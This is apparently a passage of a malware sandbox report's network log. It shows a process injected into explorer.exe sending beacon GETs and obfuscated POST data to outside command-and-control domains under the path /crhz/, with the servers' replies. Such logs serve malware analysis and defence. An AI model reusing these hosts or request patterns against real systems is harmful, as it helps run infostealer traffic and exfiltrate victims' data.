bF~6T3lQV2Hnncr5vsES11FoOH9FdU~KgnOcv48fyVrPcWDsz5BUpqo4hzjTHdJNJI13HBTzzWiHuFym8H~3ybgmB2KKGG2Owvmu9YwRy-Pqgly-uRdFjbjdlHKI7mVQAZs_BX7Q3FI9i6NIErAw85PtyHM7Im7jNY0DRfM2GPyfk-CMj3NtFVdgVrEtqr~sz2s3BV4Qdl2Ud06nMQnm4WNB0.
                                                                Jan 30, 2023 14:53:13.489326954 CET215INHTTP/1.1 301 Moved Permanently
                                                                location: http://hvlandscapes.biz/crhz/
                                                                vary: Accept-Encoding
                                                                server: DPS/2.0.0-beta+sha-0ec0b2a
                                                                x-version: 0ec0b2a
                                                                x-siteid: eu-central-1
                                                                set-cookie: dps_site_id=eu-central-1; path=/
                                                                date: Mon, 30 Jan 2023 13:53:13 GMT
                                                                keep-alive: timeout=5
                                                                transfer-encoding: chunked
                                                                connection: close
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                18192.168.2.64973676.223.105.23080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:16.479351044 CET216OUTGET /crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM HTTP/1.1
                                                                Host: www.hvlandscapes.biz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:16.502583981 CET217INHTTP/1.1 301 Moved Permanently
                                                                location: http://hvlandscapes.biz/crhz/?90Z5=-8rTZKCzAmXPlO&ghJ5T=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM
                                                                vary: Accept-Encoding
                                                                server: DPS/2.0.0-beta+sha-0ec0b2a
                                                                x-version: 0ec0b2a
                                                                x-siteid: eu-central-1
                                                                set-cookie: dps_site_id=eu-central-1; path=/
                                                                date: Mon, 30 Jan 2023 13:53:16 GMT
                                                                keep-alive: timeout=5
                                                                transfer-encoding: chunked
                                                                connection: close
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                19192.168.2.64973781.169.145.7280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:21.559890985 CET218OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.frogair.online
                                                                Connection: close
                                                                Content-Length: 191
                                                                Cache-Control: no-cache
                                                                Origin: http://www.frogair.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.frogair.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 6a 35 70 30 64 58 39 36 37 6e 67 77 41 73 7a 7e 66 64 59 6f 67 4e 47 6e 43 46 48 54 49 4f 68 44 34 42 6d 4e 72 46 56 6f 74 4c 36 37 4d 53 34 64 30 32 76 53 66 6e 43 64 4c 36 68 67 6d 34 57 55 4d 63 31 53 67 6c 76 42 47 50 5f 4f 67 49 66 28 50 6b 4a 6c 46 4c 41 46 76 6a 30 6e 36 77 44 49 54 43 59 74 44 66 6f 4f 41 59 58 35 56 65 72 6b 51 76 36 33 64 43 63 62 32 43 51 71 67 6d 47 64 7a 54 71 6a 67 47 32 35 7a 4c 41 7a 32 56 35 63 45 39 34 6e 79 38 65 49 78 58 77 4c 5f 34 4d 72 4c 57 33 54 36 51 7a 6c 4e 41 2e 00 00 00 00 00 00 00 00
                                                                Data Ascii: ghJ5T=vw0jN1Cj9L4JFj5p0dX967ngwAsz~fdYogNGnCFHTIOhD4BmNrFVotL67MS4d02vSfnCdL6hgm4WUMc1SglvBGP_OgIf(PkJlFLAFvj0n6wDITCYtDfoOAYX5VerkQv63dCcb2CQqgmGdzTqjgG25zLAz2V5cE94ny8eIxXwL_4MrLW3T6QzlNA.
                                                                Jan 30, 2023 14:53:21.582130909 CET219INHTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:53:21 GMT
                                                                Server: Apache/2.4.54 (Unix)
                                                                Content-Length: 196
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.649714185.151.199.5280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:52:17.967179060 CET103OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.n-r-eng.com
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.n-r-eng.com
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.n-r-eng.com/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 79 70 75 67 52 37 39 5a 6a 74 71 54 76 69 6c 78 36 36 32 5f 34 4f 45 5a 70 76 4e 45 41 58 49 6c 46 64 70 39 46 41 32 64 7a 36 64 69 42 48 68 6c 70 45 46 48 56 63 47 6b 4b 73 55 74 71 42 5a 5a 65 46 4d 72 42 31 65 39 34 75 41 79 43 52 75 6a 38 4b 46 5a 59 59 4d 57 42 36 70 53 42 31 49 4a 45 32 76 79 28 4b 58 5f 28 74 67 31 74 4f 73 44 6b 39 43 52 75 53 28 45 73 6f 4d 51 4c 42 31 73 58 55 4e 47 4a 6e 68 47 6f 75 4a 38 39 4a 45 74 51 42 4c 4a 50 70 38 32 50 4a 66 78 47 30 36 6f 6f 61 74 58 53 69 62 61 4b 73 55 63 30 4f 55 56 4a 45 6d 72 36 69 7e 6f 77 52 39 49 55 6c 6b 69 36 62 50 70 76 53 51 47 5a 39 68 39 4a 50 6a 79 66 4a 39 6d 56 39 66 59 63 49 42 6b 6f 44 75 65 7a 6f 5a 59 35 62 70 47 52 73 55 57 78 37 4d 74 69 39 4d 4e 61 44 72 4b 57 32 76 43 48 32 69 4f 4e 37 4c 47 32 51 52 50 4f 56 51 62 30 78 34 33 61 48 76 59 36 47 4b 6c 43 5a 55 56 6c 68 79 6b 7e 78 7e 6f 38 48 33 32 4f 68 6d 34 54 30 4a 4b 70 6b 77 5a 58 43 6e 49 48 44 77 61 7a 6b 72 7a 6a 4e 4d 75 62 4a 51 32 67 32 31 72 6f 6a 71 77 62 47 4e 75 7a 72 45 5f 57 37 35 66 6f 76 47 67 36 75 56 65 5a 56 55 34 48 42 44 35 51 69 67 6d 44 76 45 5a 36 39 55 47 73 42 41 36 50 67 66 58 6b 7a 64 51 6b 6d 48 48 76 57 64 44 56 59 6f 70 28 6a 70 55 5a 62 71 61 78 37 62 77 4e 43 72 55 53 36 65 38 7e 6a 52 6c 47 69 72 78 30 49 4f 55 78 6c 4b 41 57 41 31 58 4b 72 44 6e 4b 61 7e 4b 71 54 52 4d 33 78 6c 38 7e 6a 61 6a 78 53 76 5f 46 77 74 35 73 7a 4a 46 6b 75 65 6c 71 6a 67 4b 43 41 4b 53 4f 30 7a 35 55 79 4d 2d 74 74 74 32 43 73 32 4d 68 66 38 6e 65 76 67 43 4e 44 74 33 39 35 78 77 77 73 6d 6d 6e 52 74 30 77 71 4b 37 55 6d 4d 6d 45 55 6f 59 46 43 67 6b 57 51 73 71 41 38 69 4d 66 72 4a 63 31 54 68 2d 31 45 63 61 7a 4e 46 58 55 45 56 5f 58 75 4b 4b 45 6d 39 63 30 4b 75 39 44 69 74 44 44 71 45 43 47 71 30 4d 4d 41 75 44 7e 69 28 75 32 76 44 47 39 4e 33 5a 5a 6a 6f 61 58 67 54 59 66 6d 76 70 42 35 76 4f 55 48 6f 4b 4f 33 45 44 7a 72 4d 38 34 61 36 34 48 76 78 62 73 61 53 76 68 67 59 7a 5a 32 50 4e 57 30 56 6a 4c 51 63 37 47 58 51 42 48 7a 4e 6f 52 51 7e 53 56 73 33 5a 5a 78 6a 52 35 46 57 75 56 32 39 5a 4b 46 56 44 67 56 77 4b 53 67 42 55 30 4b 7e 47 68 73 4b 79 7a 34 6e 59 78 49 55 33 75 4a 59 5a 59 5a 61 43 55 7a 4c 4a 6c 42 6d 4c 46 4f 6f 56 39 39 46 66 68 4c 52 78 4e 76 31 42 62 77 41 4c 4c 57 46 6d 57 71 51 49 56 55 65 6a 33 54 45 30 74 41 42 6b 34 6f 65 79 77 77 42 63 65 54 52 43 4f 79 63 52 6c 46 72 56 6e 78 79 71 33 55 71 58 56 66 4b 79 50 42 4a 78 73 5a 72 61 4f 45 54 61 32 61 68 59 61 75 74 50 43 32 58 4d 34 68 47 50 44 6b 31 52 72 73 39 36 46 72 44 57 45 46 58 2d 7e 5f 6c 76 6b 58 30 61 4d 4d 4a 57 59 45 74 6c 65 79 28 46 79 79 55 79 31 30 76 6e 35 4b 75 75 65 6c 38 46 58 6d 45 46 64 43 39 73 7e 66 4c 66 55 79 46 6b 37 54 4a 76 58 46 35 2d 37 43 4c 42 6a 5f 48 6d 51 79 7a 34 49 68 71 33 4e 5a 4c 44 28 4d 76 45 41 6e 7a 78 64 67 55 31 74 78 6c 49 6b 6c 6e 6b 64 59 48 36 34 64 76 4a 69 67 73 41 66 31 58 54 32 51 77 53 65 72 35 5a 57 59 70 61 70 4b 74 6d 30 78 63 48 4b 71 77 55 38 75 6b 37 36 56 65 58 42 77 4e 58 41 70 28 35 37 55 67 2d 34 6a 57 50 44 32 7a 39 39 44 78 57 6d 54 51 39 56 6b 6f 46 56 6a 5a 57 47 52 42 6c 67 30 44 6c 64 52 6c 6a 72 53 54 72 46 52 4d 53 47 52 51 45 70 5f 51 7a 68 6e 58 36 36 39 33 75 38 6e 6a 69 47 6e 48 75 5a 53 62 74 54 79 6a 36 35 79 7e 4a 28 58 28 41 72 6d 52 61 63 6c 73 7a 72 71 6a 38 6f 4b 32 79 68 55 30 48 43 51 75 47 49 64 70 47 59 59 43 43 42 4b 79 50 64 41 6e 46 77 44 50 78 42 51 56 4a 53 4a 38 59 4c 69 72 79 6f 30 57 58 68 4a 57 32 44 55 72 73 4c 66 73 6a 4e 79 62 30 63 5f 6a 64 56 6d 4e 49 37 4b 52 42 4e 48 6b 32 43 42 65 44 4e 64 39 67 4c 32 37 73 37 55 45 66 33 30 51 55 67 55 32 43 52 46 71 2d 46 61 37 65 6a 66 4c 48 4d 57 4d 75 31 45 5a 70 67 31 7a 78 78 61 51 34 45 5a 59 64 70 35 69 36 72 6a 51 43 58 32 34 37 62 44 44 78 6b 59 4b 73 6b 67 37 68 34 6c 46 6e 45 51 6d 5a 75 45 4e 62 71 5a 52 72 35 6e 34 51 78 77 51 63 6d 30 75 6f 66 5a 47 76 50 58 35 41 44 58 4d 72 43 32 68 53 66 6d 59 31 4e 33 56 5a 5a 6e 74 62 55 76 39 73 67 54 4d 47 68 47 56 5f 4a 69 50 57 67 42 6e 66 6b
                                                                Data Ascii: ghJ5T=D0VHMBBMIqAyypugR79ZjtqTvilx662_4OEZpvNEAXIlFdp9FA2dz6diBHhlpEFHVcGkKsUtqBZZeFMrB1e94uAyCRuj8KFZYYMWB6pSB1IJE2vy(KX_(tg1tOsDk9CRuS(EsoMQLB1sXUNGJnhGouJ89JEtQBLJPp82PJfxG06ooatXSibaKsUc0OUVJEmr6i~owR9IUlki6bPpvSQGZ9h9JPjyfJ9mV9fYcIBkoDuezoZY5bpGRsUWx7Mti9MNaDrKW2vCH2iON7LG2QRPOVQb0x43aHvY6GKlCZUVlhyk~x~o8H32Ohm4T0JKpkwZXCnIHDwazkrzjNMubJQ2g21rojqwbGNuzrE_W75fovGg6uVeZVU4HBD5QigmDvEZ69UGsBA6PgfXkzdQkmHHvWdDVYop(jpUZbqax7bwNCrUS6e8~jRlGirx0IOUxlKAWA1XKrDnKa~KqTRM3xl8~jajxSv_Fwt5szJFkuelqjgKCAKSO0z5UyM-ttt2Cs2Mhf8nevgCNDt395xwwsmmnRt0wqK7UmMmEUoYFCgkWQsqA8iMfrJc1Th-1EcazNFXUEV_XuKKEm9c0Ku9DitDDqECGq0MMAuD~i(u2vDG9N3ZZjoaXgTYfmvpB5vOUHoKO3EDzrM84a64HvxbsaSvhgYzZ2PNW0VjLQc7GXQBHzNoRQ~SVs3ZZxjR5FWuV29ZKFVDgVwKSgBU0K~GhsKyz4nYxIU3uJYZYZaCUzLJlBmLFOoV99FfhLRxNv1BbwALLWFmWqQIVUej3TE0tABk4oeywwBceTRCOycRlFrVnxyq3UqXVfKyPBJxsZraOETa2ahYautPC2XM4hGPDk1Rrs96FrDWEFX-~_lvkX0aMMJWYEtley(FyyUy10vn5Kuuel8FXmEFdC9s~fLfUyFk7TJvXF5-7CLBj_HmQyz4Ihq3NZLD(MvEAnzxdgU1txlIklnkdYH64dvJigsAf1XT2QwSer5ZWYpapKtm0xcHKqwU8uk76VeXBwNXAp(57Ug-4jWPD2z99DxWmTQ9VkoFVjZWGRBlg0DldRljrSTrFRMSGRQEp_QzhnX6693u8njiGnHuZSbtTyj65y~J(X(ArmRaclszrqj8oK2yhU0HCQuGIdpGYYCCBKyPdAnFwDPxBQVJSJ8YLiryo0WXhJW2DUrsLfsjNyb0c_jdVmNI7KRBNHk2CBeDNd9gL27s7UEf30QUgU2CRFq-Fa7ejfLHMWMu1EZpg1zxxaQ4EZYdp5i6rjQCX247bDDxkYKskg7h4lFnEQmZuENbqZRr5n4QxwQcm0uofZGvPX5ADXMrC2hSfmY1N3VZZntbUv9sgTMGhGV_JiPWgBnfkVCIAl8yJci_GFzGRAXqun6Hvxzej28Y1q38udoSg3CBFs1pAVm8WpB0Kj~UHoIBN0sinILVnXYJ1ubbXrJEbnt9ReE.
                                                                Jan 30, 2023 14:52:18.047092915 CET104INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 30 Jan 2023 13:52:18 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://www.n-r-eng.com/crhz/
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                20192.168.2.64973881.169.145.7280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:24.108309984 CET221OUTPOST /crhz/ HTTP/1.1
                                                                Host: www.frogair.online
                                                                Connection: close
                                                                Content-Length: 1455
                                                                Cache-Control: no-cache
                                                                Origin: http://www.frogair.online
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://www.frogair.online/crhz/
                                                                Accept-Language: en-US
                                                                Accept-Encoding: gzip, deflate
                                                                Data Raw: 67 68 4a 35 54 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 44 70 70 6e 71 4c 39 74 72 6e 76 73 51 73 7a 6c 76 63 77 6f 67 4a 47 6e 48 39 58 54 2d 7e 68 47 5f 74 6d 4a 35 39 56 6c 4e 4c 36 39 4d 53 43 44 45 33 6b 53 66 6a 34 64 4a 69 78 67 6c 55 57 58 72 59 31 55 6a 4e 67 4f 57 50 39 5a 77 49 63 28 50 6b 51 6c 46 62 4d 46 76 6e 65 6e 36 6f 44 49 68 71 59 71 7a 66 72 43 67 59 58 35 56 65 6e 6b 51 75 72 33 64 61 45 62 79 6d 41 72 57 4b 47 64 53 66 71 69 47 4f 78 28 7a 4b 4a 35 57 56 6f 61 32 6f 51 6e 44 35 74 65 45 44 31 63 4d 51 75 6d 59 6e 73 41 76 4e 70 32 71 55 43 6c 64 59 37 6b 79 4e 54 39 73 34 4e 6a 75 57 4f 63 64 6d 71 4a 42 4c 43 45 79 53 71 28 76 4c 79 73 2d 69 34 49 78 36 45 4a 74 51 6d 4e 47 77 55 4c 46 71 5a 74 44 4b 71 51 68 65 75 47 67 66 63 49 39 51 6b 30 79 6b 72 52 37 52 51 43 4d 48 46 6e 44 34 30 4e 62 73 62 6c 6f 66 50 7e 63 51 35 38 50 6f 63 35 67 66 5a 7a 49 75 59 4a 46 4a 69 47 50 4b 38 34 51 4e 6b 28 39 6b 6f 53 5f 6c 41 7e 75 57 38 70 61 6a 31 75 48 67 41 54 30 39 50 49 4f 6a 55 71 62 6d 30 55 55 38 67 49 5a 45 5a 46 49 7a 78 4a 54 4d 37 44 41 77 52 54 45 5a 6c 56 4a 79 51 4d 6a 41 30 75 32 49 44 4e 66 31 63 51 73 79 52 47 6b 4d 6c 56 38 61 4e 73 5a 41 38 51 78 33 32 7e 30 28 42 47 4b 34 7a 49 30 41 48 53 71 7e 33 4c 68 7a 6c 52 57 64 55 39 71 58 50 55 7a 50 65 66 4e 50 53 38 6a 71 66 69 54 39 30 72 47 38 43 64 6f 52 59 6c 36 6f 61 63 37 53 54 52 69 57 51 6e 49 56 32 6d 5a 64 6e 66 4e 76 41 54 38 35 71 66 79 68 66 63 52 7a 75 46 6e 4f 31 4a 46 6d 30 74 70 51 50 70 52 57 6b 7e 38 64 76 47 61 75 4b 54 56 6e 7a 30 74 43 63 45 68 76 44 50 37 37 59 4a 7a 43 6b 63 4d 57 46 4f 51 39 44 4e 4c 4e 36 79 50 4d 79 55 61 44 46 6b 36 65 50 4c 66 38 65 4a 66 5a 6e 45 6d 74 59 49 4e 50 68 39 71 62 47 64 73 79 38 65 74 59 58 74 46 66 57 46 64 53 6f 4b 45 4e 67 35 68 32 69 4e 48 4f 77 34 6a 4a 70 45 53 53 73 39 36 35 52 6d 78 51 69 75 53 6a 73 56 30 73 68 31 74 33 44 5a 6f 33 56 58 43 4a 74 67 57 38 4c 73 4a 43 4e 30 71 70 4a 31 43 79 4d 6e 6b 63 55 6c 76 46 6a 6d 34 44 5a 63 2d 71 39 63 72 57 44 73 47 79 35 62 4e 61 45 49 79 4b 68 38 49 64 35 6d 36 50 42 41 39 69 65 62 54 45 42 68 2d 49 43 72 5f 39 6f 64 50 49 67 45 56 46 6b 7a 77 46 79 50 63 66 69 55 33 4c 33 5a 71 54 43 43 74 72 76 4c 51 59 2d 62 4b 28 69 79 4e 50 67 6d 67 77 4a 61 36 70 6e 6c 34 58 6d 51 46 6d 39 59 52 65 63 36 49 63 35 67 63 48 6b 76 70 75 46 6d 68 28 4f 4e 30 41 5a 50 64 6f 4a 33 74 34 69 75 69 4d 37 45 47 77 68 32 55 49 51 69 51 4c 44 39 4e 73 51 34 52 4d 4b 7e 58 61 72 48 6d 65 4d 31 35 6f 4f 62 33 4d 70 44 53 28 6f 54 2d 34 51 57 55 79 4d 61 35 39 68 46 64 57 56 68 63 58 71 56 48 59 75 79 76 49 62 78 30 30 4b 53 66 38 7a 54 68 31 39 35 63 63 32 31 6d 52 69 63 42 58 2d 41 47 48 73 4f 52 39 51 4a 63 44 6b 47 6c 6e 54 4f 53 6f 6a 42 65 6a 38 6d 6f 47 71 32 67 35 30 76 58 45 5f 79 65 33 72 58 4e 44 6e 36 46 30 4b 42 79 72 66 30 48 51 2d 55 78 52 42 71 6c 57 4f 6b 6c 28 67 5a 6a 28 76 57 51 73 61 67 4e 65 74 34 78 4b 32 5a 64 72 51 28 33 63 74 34 4d 46 77 66 68 5a 6b 4e 46 6f 2d 70 6b 71 59 78 6a 64 47 5a 72 68 52 76 64 59 79 42 37 79 62 56 6e 62 6f 73 68 76 62 4d 75 39 34 36 46 31 5f 7a 73 65 38 6d 51 75 2d 63 43 31 75 39 51 7e 37 35 4c 6d 59 76 4b 51 64 51 77 43 30 6e 66 39 5a 6e 57 70 66 52 42 67 71 4a 64 4e 6c 56 6e 33 67 68 77 55 4a 58 72 35 71 43 6c 35 6e 41 49 73 6a 76 33 49 5f 6c 76 46 70 28 44 72 38 54 75 28 6e 79 73 6f 79 38 36 39 49 44 78 31 6c 68 6e 36 56 6b 41 4e 4c 45 30 48 62 73 56 51 58 43 73 38 5f 48 38 47 4b 68 7a 70 59 66 76 63 32 69 31 28 79 42 6c 61 57 49 69 42 46 42 7a 61 32 6e 32 31 55 50 37 7a 61 4f 5a 62 71 64 48 63 7a 6e 39 72 31 33 69 73 49 62 62 6b 73 5a 45 45 78 65 4d 63 74 79 50 50 53 49 57 70 44 70 33 37 34 33 41 34 52 30 62 7a 52 68 67 68 72 69 56 43 79 6a 5a 43 6c 43 79 74 7a 43 42 34 5a 5a 32 6e 35 6a 30 6e 42 61 39 62 56 78 64 6b 57 4b 6f 66 62 4a 79 79 54 77 31 66 55 54 39 70 6a 77 6b 52 6c 7a 77 53 68 71 73 6d 41 4a 6b 77 79 31 5a 79 63 6d 51 4c 79 51 6f 46 38 58 58 32 6e 6f 58 48 57 33 61 62 52 37 61 43 56 72 55 34 6a 6a 4e 73 4a 7e 52 59 4c 35 52 5a 37 69 6e 37 44 77 57 41 74 28 6d 48 44 61 38 68 35 55
                                                                Data Ascii: ghJ5T=vw0jN1Cj9L4JFDppnqL9trnvsQszlvcwogJGnH9XT-~hG_tmJ59VlNL69MSCDE3kSfj4dJixglUWXrY1UjNgOWP9ZwIc(PkQlFbMFvnen6oDIhqYqzfrCgYX5VenkQur3daEbymArWKGdSfqiGOx(zKJ5WVoa2oQnD5teED1cMQumYnsAvNp2qUCldY7kyNT9s4NjuWOcdmqJBLCEySq(vLys-i4Ix6EJtQmNGwULFqZtDKqQheuGgfcI9Qk0ykrR7RQCMHFnD40NbsblofP~cQ58Poc5gfZzIuYJFJiGPK84QNk(9koS_lA~uW8paj1uHgAT09PIOjUqbm0UU8gIZEZFIzxJTM7DAwRTEZlVJyQMjA0u2IDNf1cQsyRGkMlV8aNsZA8Qx32~0(BGK4zI0AHSq~3LhzlRWdU9qXPUzPefNPS8jqfiT90rG8CdoRYl6oac7STRiWQnIV2mZdnfNvAT85qfyhfcRzuFnO1JFm0tpQPpRWk~8dvGauKTVnz0tCcEhvDP77YJzCkcMWFOQ9DNLN6yPMyUaDFk6ePLf8eJfZnEmtYINPh9qbGdsy8etYXtFfWFdSoKENg5h2iNHOw4jJpESSs965RmxQiuSjsV0sh1t3DZo3VXCJtgW8LsJCN0qpJ1CyMnkcUlvFjm4DZc-q9crWDsGy5bNaEIyKh8Id5m6PBA9iebTEBh-ICr_9odPIgEVFkzwFyPcfiU3L3ZqTCCtrvLQY-bK(iyNPgmgwJa6pnl4XmQFm9YRec6Ic5gcHkvpuFmh(ON0AZPdoJ3t4iuiM7EGwh2UIQiQLD9NsQ4RMK~XarHmeM15oOb3MpDS(oT-4QWUyMa59hFdWVhcXqVHYuyvIbx00KSf8zTh195cc21mRicBX-AGHsOR9QJcDkGlnTOSojBej8moGq2g50vXE_ye3rXNDn6F0KByrf0HQ-UxRBqlWOkl(gZj(vWQsagNet4xK2ZdrQ(3ct4MFwfhZkNFo-pkqYxjdGZrhRvdYyB7ybVnboshvbMu946F1_zse8mQu-cC1u9Q~75LmYvKQdQwC0nf9ZnWpfRBgqJdNlVn3ghwUJXr5qCl5nAIsjv3I_lvFp(Dr8Tu(nysoy869IDx1lhn6VkANLE0HbsVQXCs8_H8GKhzpYfvc2i1(yBlaWIiBFBza2n21UP7zaOZbqdHczn9r13isIbbksZEExeMctyPPSIWpDp3743A4R0bzRhghriVCyjZClCytzCB4ZZ2n5j0nBa9bVxdkWKofbJyyTw1fUT9pjwkRlzwShqsmAJkwy1ZycmQLyQoF8XX2noXHW3abR7aCVrU4jjNsJ~RYL5RZ7in7DwWAt(mHDa8h5Uo2aFpbYIHP3MHOGAIzllqP0mLNyc_tm(gubdVWD(6BgeFSqfWhkThUfadFQVckwE_7jbeJqyAM9ozXTzOL0zSejQgk.
                                                                Jan 30, 2023 14:53:24.129245043 CET222INHTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:53:24 GMT
                                                                Server: Apache/2.4.54 (Unix)
                                                                Content-Length: 196
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                21192.168.2.64973981.169.145.7280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Jan 30, 2023 14:53:26.660531998 CET222OUTGET /crhz/?ghJ5T=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&90Z5=-8rTZKCzAmXPlO HTTP/1.1
                                                                Host: www.frogair.online
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Jan 30, 2023 14:53:26.680932045 CET223INHTTP/1.1 404 Not Found
                                                                Date: Mon, 30 Jan 2023 13:53:26 GMT
                                                                Server: Apache/2.4.54 (Unix)
                                                                Content-Length: 196
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
